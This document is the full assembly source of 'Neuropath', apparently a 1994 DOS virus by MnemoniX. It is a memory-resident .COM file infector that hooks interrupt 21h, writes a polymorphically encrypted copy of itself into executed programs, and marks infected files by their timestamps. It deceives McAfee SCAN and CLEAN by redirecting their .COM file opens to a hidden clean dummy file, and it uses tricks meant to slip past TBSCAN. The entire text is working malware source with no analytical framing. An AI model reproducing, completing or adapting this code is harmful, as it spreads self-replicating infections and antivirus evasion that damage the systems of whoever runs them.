; ========================================================================>
;  [Neuropath] by MnemoniX 1994
;
;  * Memory resident .COM infector
;  * Polymorphic (engine in neuroeng.asm - lame but effective)
;  * Anti-SCAN and CLEAN stealth technique - creates hidden file in
;    root directory; when SCAN or CLEAN is run all attempts to open .COM
;    files are redirected to hidden file, and they all come out clean.
; ========================================================================>

code            segment
                org     0
                assume  cs:code

start:
                db      0E9h,0,0

virus_begin:
                call    $ + 3
                pop     bp
                sub     bp,offset $ - 1

                mov     ah,3Ch
                mov     cx,2
                lea     dx,[bp + dummy_file]    ; create dummy file
                int     21h

                mov     ah,3Eh
                int     21h

install:
                mov     ax,5786h
                int     21h

                push    ds es

                mov     ax,ds
                dec     ax
                mov     ds,ax

                sub     word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
                sub     word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
                mov     es,word ptr ds:[12h]

                push    cs                      ; copy virus into memory
                pop     ds
                xor     di,di
                mov     si,bp
                mov     cx,(virus_end - start) / 2 + 1
                rep     movsw

                xor     ax,ax                   ; capture interrupt 21
                mov     ds,ax

                mov     si,21h * 4
                mov     di,offset old_int_21
                movsw
                movsw

                mov     word ptr [si - 4],offset new_int_21
                mov     [si - 2],es

                pop     es ds
                jmp     install

int_21:
                pushf
                call    dword ptr cs:[old_int_21]
                ret

new_int_21:
                cmp     ax,5786h
                je      restore_host

                cmp     ah,4Ch
                je      terminate

                cmp     ah,3Dh
                je      file_open

                not     ax
                cmp     ax,0B4FFh
                je      execute
int_21_4B_exit:
                not     ax

int_21_exit:
                db      0EAh
old_int_21      dd      0

restore_host:
                pop     ax
                pop     ax

                push    ds
                mov     di,0FEFFh
                not     di

                lea     si,[bp + host]
                push    di
                movsw
                movsb

                iret

terminate:
                mov     cs:McAffee_alert,0
                jmp     int_21_exit

file_open:
                cmp     cs:McAffee_alert,1
                jne     int_21_exit

                push    ax si
                mov     si,dx

find_ext:
                lodsb
                cmp     al,'.'
                je      ext_found
                test    al,al
                je      not_com
                jmp     find_ext

ext_found:
                cmp     ds:[si],'OC'            ; .COM?
                jne     not_com
                cmp     byte ptr ds:[si + 2],'M'
                jne     not_com

                pop     si ax
                push    ds dx

                push    cs
                pop     ds
                mov     dx,offset dummy_file
                call    int_21

                pop     dx ds
                retf    2
not_com:
                pop     si ax
                jmp     int_21_exit

execute:
                push    ax si
                mov     si,dx

find_ext_2:
                lodsb
                cmp     al,'.'
                je      ext_found_2
                test    al,al
                je      no_scan
                jmp     find_ext_2
ext_found_2:
                cmp     ds:[si],'XE'            ; check for SCAN.EXE
                jne     no_scan
                cmp     ds:[si - 3],'NA'
                jne     no_scan
                cmp     ds:[si - 5],'CS'
                jne     perhaps_clean
mcaffee_on:
                pop     si ax
                mov     cs:McAffee_alert,1      ; McAffee alert!
                jmp     int_21_4B_exit

perhaps_clean:
                cmp     ds:[si - 5],'EL'        ; check for CLEAN.EXE
                jne     no_scan
                cmp     byte ptr ds:[si - 6],'C'
                je      mcaffee_on
no_scan:
                pop     si ax
                push    ax bx cx dx si di bp ds es

                mov     ax,3D00h
                call    int_21
                jnc     check_out
                jmp     cant_open
check_out:
                xchg    ax,bx

                push    cs                
                pop     ds

                push    bx
                mov     ax,ds:sft_1
                int     2Fh

                mov     ax,ds:sft_2
                mov     bl,es:[di]
                int     2Fh
                pop     bx

                mov     word ptr es:[di + 2],2

                mov     ax,es:[di + 0Dh]
                and     al,31
                cmp     al,24                   ; marker is 24
                je      dont_infect

                mov     ah,ds:file_read  ; anti-TBSCAN
                mov     dx,offset host
                mov     cx,3
                call    int_21

                mov     ax,word ptr ds:host
                sub     ax,'ZM'
                je      dont_infect

                mov     ax,es:[di + 11h]        ; file size
                cmp     ax,65278 - VIRUS_SIZE
                jae     dont_infect

                mov     es:[di + 15h],ax
                sub     ax,3
                mov     word ptr ds:new_jump + 1,ax

                push    es di bx
                add     ax,103h
                xchg    dx,ax
                mov     cx,VIRUS_SIZE
                mov     si,offset virus_begin
                mov     di,offset encrypt_buffer

                push    cs
                pop     es

                call    engine
                pop     bx di es

                mov     dx,offset encrypt_buffer
                call    write_it

                mov     word ptr es:[di + 15h],0
                mov     cx,3
                mov     dx,offset new_jump
                call    write_it

dont_infect:
                mov     ax,ds:set_date     ; anti-TBSCAN
                mov     cx,es:[di + 0Dh]
                mov     dx,es:[di + 0Fh]
                and     cl,-32
                or      cl,24
                call    int_21

                mov     ah,3Eh
                call    int_21
cant_open:
                pop     es ds bp di si dx cx bx ax
                jmp     int_21_4B_exit

write_it:
                mov     ah,ds:file_write   ; anti-TBSCAN
                call    int_21
                ret

                db      '[Neuropath] MnemoniX',0

dummy_file      db      '\',-1,-1,0                 ; 2 ASCII 255s

                include neuroeng.asm

McAffee_alert   db      0
host            db      0CDh,20h,0
new_jump        db      0E9h,0,0

set_date        dw      5701h
file_read       db      3Fh
file_write      db      40h
sft_1           dw      1220h
sft_2           dw      1216h

virus_end:
VIRUS_SIZE      equ     virus_end - virus_begin

encrypt_buffer  db      VIRUS_SIZE + 1000 dup (?)

heap_end:

MEM_SIZE        equ     heap_end - start

code            ends
                end     start